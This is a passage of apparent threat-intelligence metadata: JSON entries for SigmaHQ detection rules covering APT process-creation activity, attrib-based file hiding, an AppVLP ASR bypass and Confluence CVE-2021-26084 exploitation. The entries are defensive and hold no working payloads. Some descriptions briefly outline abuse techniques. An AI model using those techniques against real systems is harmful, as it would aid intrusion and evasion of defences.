"description": "Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/04/20", + "falsepositive": [ + "Should not be any false 
positives" + ], + "filename": "proc_creation_win_apt_lazarus_activity_apr21.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "4a12fa47-c735-4032-a214-6fab5b120670", + "value": "Lazarus Activity Apr21" + }, + { + "description": "Detects different process creation events as described in various threat reports on Lazarus group activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/23", + "falsepositive": [ + "Overlap with legitimate process activity in some cases (especially selection 3 and 4)" + ], + "filename": "proc_creation_win_apt_lazarus_activity_dec20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://www.hvs-consulting.de/lazarus-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a", + "value": "Lazarus Activity Dec20" + }, + { + "description": "Detects different loaders as described in various threat reports on Lazarus group activity", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2020/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_lazarus_loader.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.hvs-consulting.de/lazarus-report/", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", + "value": "Lazarus Loaders" + }, + { + "description": "Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)", + "meta": { + "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "creation_date": "2020/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_lazarus_session_highjack.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_session_highjack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "value": "Lazarus Session Highjacker" + }, + { + "description": "Detects suspicious command line patterns as seen being used by MERCURY threat actor", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_mercury.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml" + ], + "tags": [ + "attack.execution", + 
"attack.t1059.001", + "attack.g0069" + ] + }, + "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "value": "MERCURY Command Line Patterns" + }, + { + "description": "Detecting DNS tunnel activity for Muddywater actor", + "meta": { + "author": "@caliskanfurkan_", + "creation_date": "2020/06/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_muddywater_dnstunnel.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", + "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "36222790-0d43-4fe8-86e4-674b27809543", + "value": "DNS Tunnel Technique from MuddyWater" + }, + { + "description": "Detects specific process parameters as used by Mustang Panda droppers", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2019/10/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_mustangpanda.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", + "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ] + }, + "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "value": "Mustang Panda Dropper" + }, + { + "description": "Detects process command line 
patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_revil_kaseya.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", + "https://www.joesandbox.com/analysis/443736/0/html", + "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", + "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.g0115" + ] + }, + "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "value": "REvil Kaseya Incident Malware Patterns" + }, + { + "description": "Detects Silence downloader. 
These commands are hardcoded into the binary.", + "meta": { + "author": "Alina Stepchenkova, Roman Rezvukhin, Group-IB, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_silence_downloader_v3.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_silence_downloader_v3.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "attack.discovery", + "attack.t1057", + "attack.t1082", + "attack.t1016", + "attack.t1033", + "attack.g0091" + ] + }, + "uuid": "170901d1-de11-4de7-bccb-8fa13678d857", + "value": "Silence.Downloader V3" + }, + { + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "meta": { + "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_slingshot.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005", + "attack.s0111" + ] + }, + "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "value": "Defrag Deactivation" + }, + { + "description": "Detects Trojan loader activity as used by APT28", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/03/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_sofacy.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", + "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100", + "https://twitter.com/ClearskySec/status/960924755355369472", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml" + ], + "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "car.2013-10-002", + "attack.t1218.011" + ] + }, + "uuid": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "value": "Sofacy Trojan Loader Activity" + }, + { + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "meta": { + "author": "MSTIC, FPT.EagleEye", + "creation_date": "2021/06/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_sourgrum.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", + "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" + ], + "tags": [ + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "value": "SOURGUM Actor Behaviours" + }, + { + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "meta": { + "author": "Florian Roth", + 
"creation_date": "2017/10/22", + "falsepositive": [ + "Renamed SysInternals tool" + ], + "filename": "proc_creation_win_apt_ta17_293a_ps.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" + ] + }, + "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", + "value": "Ps.exe Renamed SysInternals Tool" + }, + { + "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_ta505_dropper.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ForensicITGuy/status/1334734244120309760", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml" + ], + "tags": [ + "attack.execution", + "attack.g0092", + "attack.t1106" + ] + }, + "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "value": "TA505 Dropper Load Pattern" + }, + { + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_taidoor.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml" + ], + "tags": [ + "attack.execution", + "attack.t1055.001" + ] + 
}, + "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", + "value": "TAIDOOR RAT DLL Load" + }, + { + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "meta": { + "author": "@41thexplorer, Microsoft Defender ATP", + "creation_date": "2019/11/12", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_apt_tropictrooper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "value": "TropicTrooper Campaign November 2018" + }, + { + "description": "Detects automated lateral movement by Turla group", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_commands_critical.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ] + }, + "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "value": "Turla Group Lateral Movement" + }, + { + "description": "Detects automated lateral movement by Turla group", + "meta": { + "author": "Markus Neis", + 
"creation_date": "2017/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_commands_medium.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_medium.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ] + }, + "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", + "value": "Automated Turla Group Lateral Movement" + }, + { + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_comrat_may20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" + ] + }, + "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "value": "Turla Group Commands May 2020" + }, + { + "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_unc2452_cmds.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f",
+ "value": "UNC2452 Process Creation Patterns"
+ },
+ {
+ "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/01/20",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_apt_unc2452_ps.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
+ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.t1047"
+ ]
+ },
+ "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c",
+ "value": "UNC2452 PowerShell Pattern"
+ },
+ {
+ "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. 
The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.",
+ "meta": {
+ "author": "@41thexplorer, Microsoft Defender ATP",
+ "creation_date": "2018/11/20",
+ "falsepositive": "No established falsepositives",
+ "filename": "proc_creation_win_apt_unidentified_nov_18.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/DrunkBinary/status/1063075530180886529",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unidentified_nov_18.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1218.011"
+ ]
+ },
+ "uuid": "7453575c-a747-40b9-839b-125a0aae324b",
+ "value": "Unidentified Attacker November 2018"
+ },
+ {
+ "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities",
+ "meta": {
+ "author": "Florian Roth, Markus Neis",
+ "creation_date": "2020/02/01",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1574.002",
+ "attack.g0044"
+ ]
+ },
+ "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb",
+ "value": "Winnti Malware HK University Campaign"
+ },
+ {
+ "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET",
+ "meta": {
+ "author": "Florian Roth, oscd.community",
+ "creation_date": "2020/07/30",
+ "falsepositive": [
+ "Legitimate setups that use similar flags"
+ ],
+ "filename": "proc_creation_win_apt_winnti_pipemon.yml",
+ "level": "critical",
+ "logsource.category": 
"process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1574.002",
+ "attack.g0044"
+ ]
+ },
+ "uuid": "73d70463-75c9-4258-92c6-17500fe972f2",
+ "value": "Winnti Pipemon Characteristics"
+ },
+ {
+ "description": "Detects activity mentioned in Operation Wocao report",
+ "meta": {
+ "author": "Florian Roth, frack113",
+ "creation_date": "2019/12/20",
+ "falsepositive": [
+ "Administrators that use checkadmin.exe tool to enumerate local administrators"
+ ],
+ "filename": "proc_creation_win_apt_wocao.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/",
+ "https://twitter.com/SBousseaden/status/1207671369963646976",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1012",
+ "attack.defense_evasion",
+ "attack.t1036.004",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1053.005",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab",
+ "value": "Operation Wocao Activity"
+ },
+ {
+ "description": "Detects a ZxShell start by the called and well-known function name",
+ "meta": {
+ "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro",
+ "creation_date": "2017/07/20",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_apt_zxshell.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.003",
+ "attack.defense_evasion",
+ "attack.t1218.011",
+ "attack.s0412",
+ "attack.g0001"
+ ]
+ },
+ "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc",
+ "value": "ZxShell Malware"
+ },
+ {
+ "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.",
+ "meta": {
+ "author": "Sreeman",
+ "creation_date": "2020/03/13",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml"
+ ],
+ "tags": [
+ "attack.t1204",
+ "attack.t1566.001",
+ "attack.execution",
+ "attack.initial_access"
+ ]
+ },
+ "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e",
+ "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms"
+ },
+ {
+ "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/06/07",
+ "falsepositive": [
+ "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction"
+ ],
+ "filename": "proc_creation_win_archiver_iso_phishing.yml",
+ "level": "high",
+ "logsource.category": 
"process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/1ZRR4H/status/1534259727059787783",
+ "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1566"
+ ]
+ },
+ "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1",
+ "value": "Phishing Pattern ISO in Archive"
+ },
+ {
+ "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n",
+ "meta": {
+ "author": "Sreeman",
+ "creation_date": "2020/03/13",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_asr_bypass_via_appvlp_re.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_asr_bypass_via_appvlp_re.yml"
+ ],
+ "tags": [
+ "attack.t1218",
+ "attack.defense_evasion",
+ "attack.execution"
+ ]
+ },
+ "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43",
+ "value": "Using AppVLP To Circumvent ASR File Path Rule"
+ },
+ {
+ "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084",
+ "meta": {
+ "author": "Bhabesh Raj",
+ "creation_date": "2021/09/08",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://nvd.nist.gov/vuln/detail/CVE-2021-26084",
+ 
"https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
+ "https://github.com/h3v0x/CVE-2021-26084_Confluence",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.execution",
+ "attack.t1190",
+ "attack.t1059"
+ ]
+ },
+ "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11",
+ "value": "Atlassian Confluence CVE-2021-26084"
+ },
+ {
+ "description": "Detects usage of attrib.exe to hide files from users.",
+ "meta": {
+ "author": "Sami Ruohonen",
+ "creation_date": "2019/01/16",
+ "falsepositive": [
+ "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)",
+ "Msiexec.exe hiding desktop.ini"
+ ],
+ "filename": "proc_creation_win_attrib_hiding_files.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564.001"
+ ]
+ },
+ "uuid": "4281cb20-2994-4580-aa63-c8b86d019934",
+ "value": "Hiding Files with Attrib.exe"
+ },
+ {
+ "description": "Marks a file as a system file using the attrib.exe utility",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/02/04",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_attrib_system.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564.001"
+ ]
+ },
+ "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b",
+ "value": "Set Windows System File with Attrib"
+ },
+ {
+ "description": "Detects usage of attrib with \"+s\" option to set suspicious script or executable as system files to hide them from users and make them unable to delete with simple rights. The rule limit the search to specific extensions and directories to avoid FP's",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/06/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_attrib_system_susp_paths.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4",
+ "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564.001"
+ ]
+ },
+ "uuid": "efec536f-72e8-4656-8960-5e85d091345b",
+ "value": "Set Suspicious Files as System Files Using Attrib"
+ },
+ {
+ "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/07/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_automated_collection.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_automated_collection.yml"
+ ],
+ "tags": [
+ "attack.collection",
+ "attack.t1119",
+ "attack.credential_access",
+ "attack.t1552.001"
+ ]
+ },
+ "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1",
